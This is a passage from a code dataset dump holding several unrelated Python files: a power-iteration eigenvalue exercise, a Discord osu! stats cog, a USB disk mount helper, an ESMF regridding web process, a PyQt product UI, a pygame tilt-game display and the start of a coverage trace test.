'SciPy')\n\n    return '\\n'.join(buf)\n","sub_path":"docs/source/_comparison_generator.py","file_name":"_comparison_generator.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507210564","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 31 17:34:15 2019\n\n@author: John\n\"\"\"\n\n#%% Exercise 3: Dominant eigenvalue (1st eigenvalue) of a matrix.\n\nfrom numpy import linalg as lng\nimport numpy as np\n\ndef maxEigValue(A, x0, tol):\n    x = A*x0\n    d = np.max(np.abs(x))\n    x = np.divide(x, d)\n    \n    while (lng.norm(x - x0) > tol):\n        x0 = x\n        x = A*x0\n        d = np.max(np.abs(x))\n        x = np.divide(x, d)\n    \n    d = np.round(d, 2)\n    x = np.round(x, 2)\n    \n    return d, x\n\n\nD = np.matrix([[1,-3,8],[2,-5,9],[3,-6,10]], 'float')\n\nx0 = np.ones((3,1))\ntol = 1e-3\n\nd, x = maxEigValue(D, x0, tol)\n\nX = lng.eig(D)\nnp.round(np.real(np.max(X[0])),2)\n\nprint(f\"The eigenvalue d = {d} matches the value computed by \" +\n      f\"eig(D) = {np.round(np.real(np.max(X[0])),2)}.\")\n\n# Note: instead of fixing the number of iterations, the program decides\n#       when to stop by comparing the tolerance against the difference\n#       between the computed x and the x from the previous iteration.\n#       This avoids wasting cycles unnecessarily when only one decimal\n#       of precision is required in the result.","sub_path":"Ejercicio 3.py","file_name":"Ejercicio 3.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613126036","text":"from discord.ext import commands\nfrom time import time\nimport discord\n\n\nclass Osu(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n        self.baseurl = 'https://lemmmy.pw/osusig/sig.php?'\n\n    @commands.guild_only()\n    @commands.command(aliases=['osu'])\n    async def osustats(self, ctx, *, osuplayer: str = None):\n        if not osuplayer:\n            embed = discord.Embed(\n                description=\"**\" + ctx.author.name +\n                \"** you need to tell me a username!\",\n                color=0xff0000)\n            await ctx.send(embed=embed)\n        else:\n            embed = 
discord.Embed(color=0x00ff00)\n embed.set_author(\n name=f\"{osuplayer}'s Stats\",\n url=f\"https://osu.ppy.sh/u/{osuplayer}\",\n icon_url=\"https://s.ppy.sh/images/head-logo.png\")\n embed.set_footer(text=\"Osu stats\")\n query = (\n f'colour=hexff66aa&uname={osuplayer}&pp=1&countryrank'\n '&flagshadow&flagstroke&opaqueavatar&avatarrounding=5&'\n f'onlineindicator=undefined&xpbar&xpbarhex&random={time()}')\n\n embed.set_image(url=f'{self.baseurl}{query}')\n print(f'{self.baseurl}{query}')\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(Osu(bot))\n","sub_path":"cogs/osu.py","file_name":"osu.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175069014","text":"import os\nimport contextlib\nimport time\nfrom inaugurator import sh\n\n\nclass DiskOnKey:\n _MOUNT_POINT = \"/sourceDOK\"\n\n def __init__(self):\n self._device = self._findDevice()\n self._partiton = self._device + \"1\"\n\n @contextlib.contextmanager\n def mount(self):\n os.makedirs(self._MOUNT_POINT)\n sh.run(\"busybox modprobe vfat\")\n sh.run(\"/usr/sbin/busybox mount -t vfat -o ro %s %s\" % (\n self._partiton, self._MOUNT_POINT))\n yield self._MOUNT_POINT\n sh.run(\"/usr/sbin/busybox umount %s\" % self._MOUNT_POINT)\n\n def _findDevice(self):\n sh.run(\"busybox modprobe usb_storage\")\n for i in xrange(10):\n try:\n return self._findDeviceOnce()\n except:\n time.sleep(1)\n sh.run(\"/usr/sbin/busybox mdev -s\")\n return self._findDeviceOnce()\n\n def _findDeviceOnce(self):\n for letter in ['a', 'b', 'c', 'd', 'e', 'f']:\n candidate = \"/dev/sd%s\" % letter\n if not os.path.exists(candidate):\n continue\n if self._deviceSizeGB(candidate) > 32:\n continue\n return candidate\n raise Exception(\"Unable to find a device that looks like a DOK\")\n\n def _deviceSizeGB(self, device):\n return int(sh.run(\"sfdisk -s %s\" % device)) / 1024 / 1024\n","sub_path":"inaugurator/diskonkey.py","file_name":"diskonkey.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262203551","text":"# TODO: Rename this file \"wps_esmf_process\"\nimport logging\nimport os\n\nimport ESMF\nimport ocgis\nfrom eggshell.log import init_process_logger\nfrom pywps import ComplexInput, ComplexOutput\nfrom pywps import Format, configuration, get_format\nfrom pywps import LiteralInput\nfrom pywps import Process\nfrom pywps.app.Common import Metadata\n\nfrom flyingpigeon.utils import archiveextract\nfrom flyingpigeon.utils import rename_complexinputs\n\nLOGGER = logging.getLogger(\"PYWPS\")\n\njson_format = get_format('JSON')\n\n# Supported interpolation methods\nmethods = list(map(str.lower, ESMF.RegridMethod.__members__.keys()))\n\n\ndef extract_doc():\n \"\"\"Format the documentation about the ESMF regridding methods.\"\"\"\n import inspect\n import re\n\n source = inspect.getsource(ESMF.RegridMethod)\n doc = source.replace('\"\"\"', '')\n\n def title(match):\n [name] = match.groups()\n n = len(name)\n return '\\n ' + name + '\\n ' + n * '~'\n\n doc = re.sub('(\\w+) = \\d', title, doc)\n lines = doc.splitlines()[3:]\n lines.insert(0, ' Notes')\n lines.insert(1, ' -----')\n\n return '\\n'.join(lines)\n\n\ndef actual_output_path(fn):\n \"\"\"Return the path to an output file, adjusting for whether or not the server is active or not.\n\n Example\n -------\n On a local server it would yield something like::\n\n 
http://localhost:8090/wpsoutputs/flyingpigeon/af06fb/af06fb.nc\n\n While in test mode it would yield::\n\n file:///tmp/af06fb/af06fb.nc\n\n \"\"\"\n outputurl = configuration.get_config_value('server', 'outputurl')\n outputpath = configuration.get_config_value('server', 'outputpath')\n\n return os.path.join(outputurl, os.path.relpath(fn, outputpath))\n\n\nclass ESMFRegridProcess(Process):\n \"\"\"\n Notes\n -----\n\n Bilinear\n Destination value is a linear combination of the\n source values in the cell which contains the destination point. The weights\n for the linear combination are based on the distance of the destination\n point from each source value.\n\n Patch\n Higher-order patch recovery interpolation. Destination value is a weighted\n average of 2D polynomial patches constructed from cells surrounding the\n source cell which contains the destination point. This method typically\n results in better approximations to values and derivatives than bilinear.\n However, because of its larger stencil, it also results in a much larger\n interpolation matrix than the bilinear method.\n\n Conserve\n First order conservative interpolation. Value of a destination cell is the\n weighted sum of the values of the source cells that it overlaps. The\n weights are determined by the amount the source cell overlaps the\n destination cell. This method will typically give less accurate\n approximations to values than the other interpolation methods, however, it\n will do a much better job preserving the integral of the value between the\n source and destination. This method requires the corner coordinate values\n to be provided in the Grid, and it currently only works for Fields created\n on the Grid center stagger (or the Mesh element location).\n\n Nearest_STOD\n In this version of nearest neighbor interpolation each destination point is\n mapped to the closest source point. A given source point may go to multiple\n destination points, but no destination point will receive input from more\n than one source point.\n\n Nearest_DTOS\n In this version of nearest neighbor interpolation each source point is\n mapped to the closest destination point. A given destination point may\n receive input from multiple source points, but no source point will go to\n more than one destination point.\n \"\"\"\n\n def __init__(self):\n inputs = [\n ComplexInput('resource', 'Resource',\n abstract='NetCDF Files or archive (tar/zip) containing NetCDF files.',\n metadata=[Metadata('Info')],\n min_occurs=1,\n max_occurs=1000,\n supported_formats=[\n Format('application/x-netcdf'),\n Format('application/x-tar'),\n Format('application/zip'),\n ]),\n\n ComplexInput('dest', 'Grid destination',\n abstract='NetCDF file whose grid defines the interpolation target.',\n metadata=[Metadata('Info')],\n min_occurs=1,\n max_occurs=1,\n supported_formats=[\n Format('application/x-netcdf'),\n Format('application/x-tar'),\n Format('application/zip'),\n ]),\n\n LiteralInput(\"method\", \"Regridding method\",\n abstract=\"Regridding method. 
Note that `conserve` requires grid corners to be defined.\",\n default=\"bilinear\",\n allowed_values=methods,\n data_type='string',\n min_occurs=0,\n max_occurs=1,\n ),\n\n LiteralInput(\"snippet\", \"Snippet\",\n abstract=\"Run process only for first time step.\",\n default=\"False\",\n data_type=\"boolean\",\n min_occurs=0,\n max_occurs=1)\n ]\n outputs = [\n ComplexOutput('output_log', 'Logging information',\n abstract=\"Collected logs during process run.\",\n as_reference=True,\n supported_formats=[Format('text/plain')]\n ),\n\n ComplexOutput('output', 'Links to regridded dataset',\n abstract=\"JSON file listing the regridded netCDF URLs.\",\n as_reference=True,\n supported_formats=[json_format]\n ),\n\n ComplexOutput('output_netcdf', 'NetCDF file',\n abstract=\"First NetCDF file generated by process.\",\n as_reference=True,\n supported_formats=[Format('application/x-netcdf')]\n ),\n ]\n\n super(ESMFRegridProcess, self).__init__(\n self._handler,\n identifier=\"esmf_regrid\",\n title=\"ESMF regridding\",\n abstract='Regrid netCDF files to a destination grid.',\n version=\"0.10\",\n metadata=[\n Metadata('Doc', 'http://flyingpigeon.readthedocs.io/en/latest/'),\n ],\n inputs=inputs,\n outputs=outputs,\n status_supported=True,\n store_supported=True,\n )\n\n def _handler(self, request, response):\n import uuid\n import time\n import json\n outputpath = configuration.get_config_value('server', 'outputpath')\n init_process_logger('log.txt')\n response.outputs['output_log'].file = 'log.txt'\n\n # -------------- #\n # Input handling #\n # -------------- #\n resource = archiveextract(\n resource=rename_complexinputs(request.inputs['resource']))\n LOGGER.info(\"resource: %s \" % resource)\n\n dest = archiveextract(\n resource=rename_complexinputs(request.inputs['dest']))\n LOGGER.info(\"dest: %s \" % dest)\n\n method = request.inputs['method'][0].data\n LOGGER.info(\"method: %s \" % method)\n\n snippet = request.inputs['snippet'][0].data\n LOGGER.info(\"snippet: %s \" % snippet)\n\n # -------------------- #\n # Regridding operation #\n # -------------------- #\n d = ocgis.RequestDataset(dest)\n m = getattr(ESMF.RegridMethod, method.upper())\n LOGGER.info('Start ocgis module call function')\n\n # Prepare the environment\n ocgis.env.OVERWRITE = True\n prefix = str(uuid.uuid1())\n ocgis.env.PREFIX = prefix\n\n outputs = []\n for source in resource:\n s = ocgis.RequestDataset(source)\n ops = ocgis.OcgOperations(dataset=s, regrid_destination=d, regrid_options={'regrid_method': m},\n snippet=snippet,\n dir_output=outputpath, output_format='nc', prefix=prefix\n )\n outputs.append(ops.execute())\n\n response.outputs['output_netcdf'].file = outputs[0]\n\n time_str = time.strftime(\"%Y-%m-%dT%H:%M:%SZ\", time.gmtime())\n output_json = \"esmf_regrid_results_{}.json\".format(time_str)\n with open(output_json, 'w') as f:\n f.write(json.dumps([actual_output_path(o) for o in outputs]))\n\n response.outputs['output'].file = output_json\n response.outputs['output'].output_format = json_format\n return response\n","sub_path":"flyingpigeon/processes/wps_regrid.py","file_name":"wps_regrid.py","file_ext":"py","file_size_in_byte":9157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227523140","text":"from PyQt5 import uic\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QWidget, QAbstractItemView, QHeaderView, QTableWidgetItem, QAction, QMessageBox\n\nfrom CoffeeApp.application_coffee_practice.dao.product_dao import ProductDao\nfrom 
CoffeeApp.application_coffee_practice.ui.sale import SaleUI\nfrom CoffeeApp.application_coffee_practice.ui.saledetail import SaledetailUI\n\n\nclass ProductUI(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.ui = uic.loadUi(\"ui/product.ui\") # when launched from the external main script\n        self.ui.show()\n        self.Product = ProductDao()\n        self.ui.tableWidget.setHorizontalHeaderLabels([\"Code\", \"Product\"]) # set the header labels right away\n        # select whole rows / previously the selection was per cell\n        self.ui.tableWidget.setSelectionBehavior(QAbstractItemView.SelectRows)\n        # disable in-place editing\n        self.ui.tableWidget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n        # stretch the columns to even widths\n        self.ui.tableWidget.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n        self.ui.btn_search.clicked.connect(self.select_item)\n        self.ui.btn_add.clicked.connect(self.add_item)\n        self.ui.btn_update.clicked.connect(self.update_item)\n        self.ui.btn_del.clicked.connect(self.delete_item)\n        self.ui.btn_init.clicked.connect(self.init_item)\n        self.ui.btn_sale.clicked.connect(self.show_sale) # show the price-adjustment window\n        self.ui.btn_saledetail.clicked.connect(self.show_saledetail) # show the sale-details window\n        self.ui.btn_update.hide()\n        self.load_data(self.Product.select_item())\n        # context menu on right click\n        self.set_context_menu(self.ui.tableWidget)\n\n    def init_item(self):\n        self.ui.le_code.clear()\n        self.ui.le_name.clear()\n        self.ui.btn_add.show()\n        self.ui.btn_del.show()\n        self.ui.btn_init.show()\n        self.ui.btn_search.show()\n        self.ui.le_code.setEnabled(True)\n        self.ui.le_name.setEnabled(True)\n        self.load_data(self.Product.select_item())\n\n    def show_sale(self):\n        self.sale_window = SaleUI() # keep a reference so the window is not garbage-collected\n\n    def show_saledetail(self):\n        self.saledetail_window = SaledetailUI()\n\n    def __update(self):\n        QMessageBox.information(self, 'Edit', \"Loading the selected record for editing.\", QMessageBox.Ok)\n        selectionIdxs = self.ui.tableWidget.selectedIndexes()[0]\n        self.ui.le_code.setText(self.ui.tableWidget.item(selectionIdxs.row(), 0).text())\n        self.ui.le_name.setText(self.ui.tableWidget.item(selectionIdxs.row(), 1).text())\n        self.ui.btn_update.show()\n        self.ui.le_code.setEnabled(False)\n        # self.ui.le_name.setEnabled(True)\n        self.ui.btn_add.hide()\n        self.ui.btn_del.hide()\n        self.ui.btn_init.hide()\n        self.ui.btn_search.hide()\n\n    def __delete(self):\n        QMessageBox.information(self, 'Delete', \"Deleting.\", QMessageBox.Ok)\n        selectionIdxs = self.ui.tableWidget.selectedIndexes()[0] # take the first of the selected indexes\n\n    def set_context_menu(self, tv):\n        tv.setContextMenuPolicy(Qt.ActionsContextMenu) # attach actions as a context (shortcut) menu\n        update_action = QAction(\"Load record to edit\", tv)\n        tv.addAction(update_action) # the QAction runs on right click\n        update_action.triggered.connect(self.__update)\n\n    def get_item_from_le(self):\n        code = self.ui.le_code.text()\n        name = self.ui.le_name.text()\n        return self.create_item(code, name)\n\n    def create_item(self, code, name):\n        item_code = QTableWidgetItem()\n        item_code.setTextAlignment(Qt.AlignCenter) # Qt Core\n        item_code.setData(Qt.DisplayRole, code)\n        item_name = QTableWidgetItem()\n        item_name.setTextAlignment(Qt.AlignCenter)\n        item_name.setData(Qt.DisplayRole, name)\n        return item_code, item_name\n\n    def load_data(self, data):\n        self.ui.tableWidget.setRowCount(0) # clear existing rows\n        for idx, (code, name) in enumerate(data): # enumerate yields 0, 1, 2, ...\n            item_code, item_name = self.create_item(code, name)\n            nextIdx = self.ui.tableWidget.rowCount()\n            self.ui.tableWidget.insertRow(nextIdx)\n            self.ui.tableWidget.setItem(nextIdx, 0, item_code)\n            self.ui.tableWidget.setItem(nextIdx, 1, item_name)\n\n    def add_item(self):\n        item_code, item_name = self.get_item_from_le() # built by the helper below\n        currentIdx = 
self.ui.tableWidget.rowCount()\n        self.ui.tableWidget.insertRow(currentIdx) # add a row\n        self.Product.insert_item(self.ui.le_code.text(), self.ui.le_name.text())\n        self.init_item()\n        self.load_data(self.Product.select_item())\n        QMessageBox.information(self, 'Add', \"Added.\", QMessageBox.Ok)\n\n    def update_item(self):\n        item_code, item_name = self.get_item_from_le() # built by the helper below\n        selectionIdxs = self.ui.tableWidget.selectedIndexes()[0]\n        self.Product.update_item(self.ui.le_name.text(), self.ui.le_code.text())\n        self.load_data(self.Product.select_item())\n        self.init_item()\n        self.ui.btn_update.hide()\n        QMessageBox.information(self, 'Edit', \"Updated.\", QMessageBox.Ok)\n\n    def delete_item(self):\n        selectionIdxs = self.ui.tableWidget.selectedIndexes()[0] # take the first of the selected indexes\n        self.Product.delete_item(self.ui.tableWidget.item(selectionIdxs.row(), 0).text())\n        self.init_item()\n        self.load_data(self.Product.select_item())\n        QMessageBox.information(self, 'Delete', \"Deleted.\", QMessageBox.Ok)\n\n    def select_item(self):\n        item_code, item_name = self.get_item_from_le() # built by the helper below\n        currentIdx = self.ui.tableWidget.rowCount()\n        self.load_data(self.Product.select_item(self.ui.le_code.text()))\n\n\n\n","sub_path":"03_Application_Coffee(Pyqt_MySQL)/01_application_coffee_aworkerJI/ui/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":5968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592041630","text":"#!/usr/bin/python\n\nimport pygame\nimport urllib\nimport sys\nimport threading\nimport numpy as np\nimport json\nimport webclient\nfrom client import getGame, resetGame\nfrom Game import *\nfrom Angles import *\nfrom User import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom math import radians\nfrom pygame.locals import *\nfrom constants import *\n\n##################################################################################\n## Graphical display / game code\n##################################################################################\n\n# This helps my tiny brain\nGRID_MINX = -2\nGRID_MAXX = 2\nGRID_MINY = -1\nGRID_MAXY = 1\nGRID_MINZ = -1\nGRID_MAXZ = 1\nCOLOR_WHITE = (1.0, 1.0, 1.0)\nCOLOR_BLACK = (.0, .0, .0)\nCOLOR_BLUE = (.5, .5, .7)\nTEXTORIGIN_ANGLE = (0,GRID_MINY - 0.52,GRID_MAXZ)\nTEXT_NOGAME = [\"Hit n to start\", \"new game\"]\nTEXTORIGIN_GAMENAME1 = (GRID_MINX,GRID_MINY - 0.36,GRID_MAXZ)\nTEXTORIGIN_GAMENAME2 = (GRID_MINX,GRID_MINY - 0.56,GRID_MAXZ)\nTEXTORIGIN_GAMESCORE = (GRID_MAXX - 0.5,GRID_MINY - 0.36,GRID_MAXZ)\nTEXTORIGIN_GAMETIME = (GRID_MAXX - 0.5,GRID_MINY - 0.56,GRID_MAXZ)\nTEXTORIGIN_INPUTS = (0, 0.1, GRID_MAXZ/2)\nTEXTOFFSET_INPUTS = (0, -0.3, 0)\nLOGOORIGIN = (0,GRID_MAXY,GRID_MAXZ)\nTEXT_SPACEWAITING = \"\"\nGUELOGO_PATH = \"img/gue-logo.bmp\"\n\ndebug = True\n\ndef resize(width, height):\n    glViewport(0, 0, width, height)\n    glMatrixMode(GL_PROJECTION)\n    glLoadIdentity()\n    gluPerspective(45.0, float(width) / height, 0.001, 10.0)\n    glMatrixMode(GL_MODELVIEW)\n    glLoadIdentity()\n    gluLookAt(0.0, 0.0, 5.0,\n              0.0, 0.0, 0.0,\n              0.0, 1.0, 0.0)\n\ndef init():\n    glEnable(GL_DEPTH_TEST)\n    glClearColor(0.0, 0.0, 0.0, 0.0)\n    glShadeModel(GL_SMOOTH)\n    glEnable(GL_BLEND)\n    glEnable(GL_POLYGON_SMOOTH)\n    glHint(GL_POLYGON_SMOOTH_HINT, GL_NICEST)\n    glEnable(GL_COLOR_MATERIAL)\n    glEnable(GL_LIGHTING)\n    glEnable(GL_LIGHT0)\n    glLightfv(GL_LIGHT0, GL_AMBIENT, (0.3, 0.3, 0.3, 1.0));\n\ndef getScreenCoords(position):\n    model = glGetDoublev(GL_MODELVIEW_MATRIX)\n    proj = glGetDoublev(GL_PROJECTION_MATRIX)\n    
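# viewport rectangle (x, y, width, height) used for the window-coordinate mapping\n    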
view = glGetIntegerv(GL_VIEWPORT)\n return gluProject(position[0], position[1], position[2], model, proj, view)\n\ndef drawText(position, textString, size, centered = True, rightaligned = False, color = RGBA_BLACK, background = RGBA_WHITE): \n font = pygame.font.Font (None, size)\n textSurface = font.render(textString, True, color, background) \n textData = pygame.image.tostring(textSurface, \"RGBA\", True)\n # Size is in window coordinates, so work in that system \n screenpos = getScreenCoords(position)\n if centered:\n textpos = (screenpos[0] - (textSurface.get_width()/2), screenpos[1], screenpos[2])\n else: \n if rightaligned:\n textpos = (screenpos[0] - (textSurface.get_width()), screenpos[1], screenpos[2])\n else:\n textpos = (screenpos[0], screenpos[1], screenpos[2])\n glEnable(GL_BLEND)\n glWindowPos3d(*textpos) \n glDrawPixels(textSurface.get_width(), textSurface.get_height(), GL_RGBA, GL_UNSIGNED_BYTE, textData)\n\ndef drawLogo(position, centered = True):\n img = pygame.image.load(GUELOGO_PATH)\n img.convert()\n imgData = pygame.image.tostring(img, \"RGBA\", True)\n # Size is in window coordinates, so work in that system \n screenpos = getScreenCoords(position)\n if centered:\n imgpos = (screenpos[0] - (img.get_width()/2), screenpos[1], screenpos[2])\n else:\n imgpos = (screenpos[0], screenpos[1], screenpos[2])\n glWindowPos3d(*imgpos) \n glDrawPixels(img.get_width(), img.get_height(), GL_RGBA, GL_UNSIGNED_BYTE, imgData)\n\ndef exit():\n pygame.quit()\n sys.exit(0)\n\ndef getText(origin, titleText):\n inputting = True\n inputValue = \"\"\n while inputting:\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n drawText(origin, titleText, 32)\n drawText(np.add(origin,TEXTOFFSET_INPUTS), inputValue, 32)\n pygame.display.flip()\n\n then = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type == KEYDOWN and event.key == K_RETURN:\n inputting = False\n return inputValue\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n inputting = False\n return \"\"\n if event.type == KEYDOWN and event.key == K_BACKSPACE:\n inputValue = inputValue[:-1]\n break\n if event.type == KEYDOWN:\n inputValue = inputValue + event.unicode\n\ndef newGame():\n if debug:\n print(\"New game\")\n resetGame(getGame().gameName)\n email = getText(TEXTORIGIN_INPUTS, \"Please type your email address\")\n print(email)\n if email == \"\":\n return\n user = findUser(email=email)\n if not user:\n # User doesn't exist\n userName = getText(TEXTORIGIN_INPUTS, \"Please type your name\")\n print(userName)\n if userName == \"\":\n return\n user = User(userName, email)\n user.save()\n getGame().setUser(user)\n else:\n getGame().setUser(user)\n\n getGame().state = GAME_WAITING\n\ndef run(gameName):\n pygame.init()\n DISPLAY_FLAGS = HWSURFACE | OPENGL | DOUBLEBUF\n SCREEN_SIZE = [0,0]\n info = pygame.display.Info()\n if debug:\n print(\"Screen width %d, Height %d\" % (info.current_w, info.current_h))\n# if info.current_w <= 800:\n DISPLAY_FLAGS = DISPLAY_FLAGS | FULLSCREEN | NOFRAME\n# else:\n# SCREEN_SIZE = [800, 600]\n screen = pygame.display.set_mode( SCREEN_SIZE, DISPLAY_FLAGS )\n# newsize = (min(info.current_w, 800), min(info.current_h,600))\n newsize = (info.current_w, info.current_h)\n resize(*newsize)\n init()\n clock = pygame.time.Clock()\n backdrop = Backdrop(COLOR_BLACK)\n cube = Cube((0.0, 0.0, 0.0), COLOR_BLUE)\n\n angles = Angles(SERVER_URL)\n angles.start()\n\n getGame().setGameName(gameName)\n\n while True:\n then = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type 
== QUIT:\n exit()\n if event.type == KEYDOWN and (event.key == K_ESCAPE or event.key == K_q):\n # Escape and Q either quit the current game or the app\n if getGame().state == GAME_NONE:\n exit()\n else:\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n drawText(TEXTORIGIN_INPUTS, \"Are you sure you want to finish game? Y/N\", 32)\n pygame.display.flip()\n angles.pause()\n while angles.isPaused():\n then2 = pygame.time.get_ticks()\n for event2 in pygame.event.get():\n if event2.type == KEYDOWN and (event2.key == K_y):\n getGame().score = 0.0\n getGame().state = GAME_NONE\n angles.unpause()\n if event2.type == KEYDOWN and (event2.key == K_n):\n angles.unpause()\n if event.type == KEYDOWN and event.key == K_n:\n angles.pause()\n newGame()\n angles.unpause()\n if event.type == KEYDOWN and event.key == K_c:\n angles.calibrate()\n if getGame().state == GAME_RUNNING and event.type == KEYDOWN and event.key == K_SPACE:\n angles.pause()\n # Space ends the current game and records the score\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n origin = TEXTORIGIN_INPUTS\n drawText(origin, \"Congratulations {}!\".format(getGame().user.userName), 32)\n origin = np.add(origin, TEXTOFFSET_INPUTS)\n drawText(origin, \"Your final score was {:10.1f}\".format(getGame().score), 32)\n origin = np.add(origin, TEXTOFFSET_INPUTS)\n drawText(origin, \"Press space to continue\", 32)\n pygame.display.flip()\n getGame().save()\n while angles.isPaused():\n then2 = pygame.time.get_ticks()\n for event2 in pygame.event.get():\n if event2.type == KEYDOWN and (event2.key == K_SPACE):\n getGame().score = 0.0\n getGame().state = GAME_NONE\n angles.unpause()\n if getGame().state == GAME_WAITING and event.type == KEYDOWN and event.key == K_SPACE:\n angles.pause()\n getGame().score = 0.0\n getGame().state = GAME_RUNNING\n angles.setStartTime()\n angles.unpause()\n\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n backdrop.render()\n glPushMatrix()\n glRotate(angles.getY(), 0, 0, -1)\n cube.render()\n glPopMatrix()\n drawLogo(LOGOORIGIN)\n if getGame().state != GAME_WAITING:\n# if debug:\n# print(\"getY %.2f Y %.2f calibrate_y %.2f\" % (angles.getY(), angles.y, angles.calibrate_y))\n# print(\"getTilt %.2f Tilt %.2f calibrate_tilt %.2f\" % (angles.getTilt(), angles.tilt, angles.calibrate_tilt))\n drawText(TEXTORIGIN_ANGLE, \"%.2f (%.2f)\" % (angles.getTilt(), abs(angles.tilt)) + u'\\N{DEGREE SIGN}', 64, color = angles.getColor())\n if getGame().state != GAME_NONE:\n if getGame().state == GAME_WAITING:\n drawText(TEXTORIGIN_GAMENAME1, TEXT_SPACEWAITING, 32, False)\n else:\n drawText(TEXTORIGIN_GAMENAME1, getGame().user.userName, 32, False)\n drawText(TEXTORIGIN_GAMENAME2, getGame().user.initials, 32, False)\n drawText(TEXTORIGIN_GAMESCORE, \"Score: {:10.1f}\".format(getGame().score), 32, rightaligned = True)\n drawText(TEXTORIGIN_GAMETIME, \"Time: {:10.1f}\".format(getGame().duration), 32, rightaligned = True)\n else:\n drawText(TEXTORIGIN_GAMENAME1, TEXT_NOGAME[0], 32, False)\n drawText(TEXTORIGIN_GAMENAME2, TEXT_NOGAME[1], 32, False)\n\n pygame.display.flip()\n\nclass Backdrop(object):\n def __init__(self, color):\n self.color = color\n\n def render(self):\n then = pygame.time.get_ticks()\n glColor(self.color)\n\n glLineWidth(1)\n glBegin(GL_LINES)\n\n for x in range(-20, 22, 2):\n glVertex3f(x/10.,-1,1)\n glVertex3f(x/10.,-1,-1)\n \n for x in range(-20, 22, 2):\n glVertex3f(x/10.,-1, -1)\n glVertex3f(x/10., 1, -1)\n \n for z in range(-10, 12, 2):\n glVertex3f(-2, -1, z/10.)\n 
glVertex3f( 2, -1, z/10.)\n\n for z in range(-10, 12, 2):\n glVertex3f(-2, -1, z/10.)\n glVertex3f(-2, 1, z/10.)\n\n for z in range(-10, 12, 2):\n glVertex3f( 2, -1, z/10.)\n glVertex3f( 2, 1, z/10.)\n\n for y in range(-10, 12, 2):\n glVertex3f(-2, y/10., -1)\n glVertex3f( 2, y/10., -1)\n \n for y in range(-10, 12, 2):\n glVertex3f(-2, y/10., -1)\n glVertex3f(-2, y/10., 1)\n \n for y in range(-10, 12, 2):\n glVertex3f(2, y/10., -1)\n glVertex3f(2, y/10., 1)\n \n glEnd()\n\nclass Cube(object):\n\n def __init__(self, position, color):\n self.position = position\n self.color = color\n\n # Cube information\n num_faces = 6\n\n vertices = [ (-1.0, -0.05, 0.5),\n (1.0, -0.05, 0.5),\n (1.0, 0.05, 0.5),\n (-1.0, 0.05, 0.5),\n (-1.0, -0.05, -0.5),\n (1.0, -0.05, -0.5),\n (1.0, 0.05, -0.5),\n (-1.0, 0.05, -0.5) ]\n\n normals = [ (0.0, 0.0, +1.0), # front\n (0.0, 0.0, -1.0), # back\n (+1.0, 0.0, 0.0), # right\n (-1.0, 0.0, 0.0), # left\n (0.0, +1.0, 0.0), # top\n (0.0, -1.0, 0.0) ] # bottom\n\n vertex_indices = [ (0, 1, 2, 3), # front\n (4, 5, 6, 7), # back\n (1, 5, 6, 2), # right\n (0, 4, 7, 3), # left\n (3, 2, 6, 7), # top\n (0, 1, 5, 4) ] # bottom\n\n def render(self):\n then = pygame.time.get_ticks()\n glColor(self.color)\n\n vertices = self.vertices\n\n # Draw all 6 faces of the cube\n glBegin(GL_QUADS)\n\n for face_no in xrange(self.num_faces):\n glNormal3dv(self.normals[face_no])\n v1, v2, v3, v4 = self.vertex_indices[face_no]\n glVertex(vertices[v1])\n glVertex(vertices[v2])\n glVertex(vertices[v3])\n glVertex(vertices[v4])\n glEnd()\n\n","sub_path":"client/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":12947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"306077656","text":"# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0\n# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt\n\n# Show the current frame's trace function, so that we can test what the\n# command-line options do to the trace function used.\n\nimport sys\n\n# Show what the trace function is. If a C-based function is used, then f_trace\n# may be None.\ntrace_fn = sys._getframe(0).f_trace\nif trace_fn is None:\n trace_name = \"None\"\nelse:\n # Get the name of the tracer class. 
